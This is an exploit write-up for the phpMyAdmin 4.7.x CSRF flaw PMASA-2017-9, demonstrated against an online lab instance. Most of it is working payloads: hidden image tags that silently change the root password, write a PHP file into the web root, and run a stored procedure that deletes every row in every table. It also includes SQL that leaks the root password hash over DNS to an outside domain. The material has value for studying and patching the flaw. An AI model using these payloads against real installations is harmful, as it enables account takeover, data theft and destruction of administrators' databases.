phpMyAdmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9) Exploit

Author: @Ambulong

phpMyAdmin is a well-known MySQL/MariaDB online management tool, phpMyAdmin team released the version 4.7.7 that addresses the CSRF vulnerability found by Barot. (PMASA-2017-9). The vulnerability allows an attacker to execute an arbitrary SQL statement silently by inducing an administrator to access malicious pages.

---

1 phpMyAmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9)

phpMyAdmin is a well-known MySQL/MariaDB online management tool, phpMyAdmin team released the version 4.7.7 that addresses the CSRF vulnerability found by Barot. (PMASA-2017-9). The vulnerability allows an attacker to execute an arbitrary SQL statement silently by inducing an administrator to access malicious pages.

In this article, we will use VulnSpy’s online phpMyAdmin environment to demonstrate the exploit of this vulnerability.

VulnSpy’s online phpMyAdmin environment address: https://www.vulnspy.com/?u=pmasa-2017-9

2 Exploit CSRF - Modifying the password of current user

Change the current user password to www.vulnspy.com, SQL command:

SET passsword=PASSWORD('www.vulnspy.com');

Exploit Demonstration

2.1 Log in to phpMyAdmin

Username: root Password: toor

2.2 Create a page with malicious code.

Filename: 2.payload.html

<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=SET%20password
%20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />

2.3 Open the file 2.payload.html in browser

Go back to phpMyAdmin, you’ll find that the account has been loged out automatically, and the password of root have been changed.

2.4 Login successfully with the password www.vulnspy.com

3 Exploit CSRF - Arbitrary File Write

Write the code <?php phpinfo();?> to the file /var/www/html/test.php, SQL command:

select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';

Exploit Demonstration

3.1 Payload

<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';" style="display:none;" />

3.2 Open the file contain the payload in browser

3.3 Visit test.php

4 Exploit CSRF - Data Retrieval over DNS

Steal the password hash of root, SQL command:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.vulnspy.com\\test'));

Fetch the current database name:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.vulnspy.com\\test'));

VSPlate not supports this exploit

5 Exploit CSRF - Empty All Rows From All Tables

Empty all rows from all tables, SQL command:

DROP PROCEDURE IF EXISTS EMPT;
DELIMITER $$
    CREATE PROCEDURE EMPT()
    BEGIN
        DECLARE i INT;
        SET i = 0;
        WHILE i < 100 DO
            SET @del = (SELECT CONCAT('DELETE FROM ',TABLE_SCHEMA,'.',TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT LIKE '%_schema' and TABLE_SCHEMA!='mysql' LIMIT i,1);
            PREPARE STMT FROM @del;
            EXECUTE STMT;
            SET i = i +1;
        END WHILE;
    END $$
DELIMITER ;

CALL EMPT();

Exploit Demonstration

5.1 Payload

<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A" style="display:none;" />

5.2 Open the file contain the payload in browser

5.3 Go back to phpMyAdmin

You’ll find the data in database vulnspy_tables and vulnspy_test have been deleted.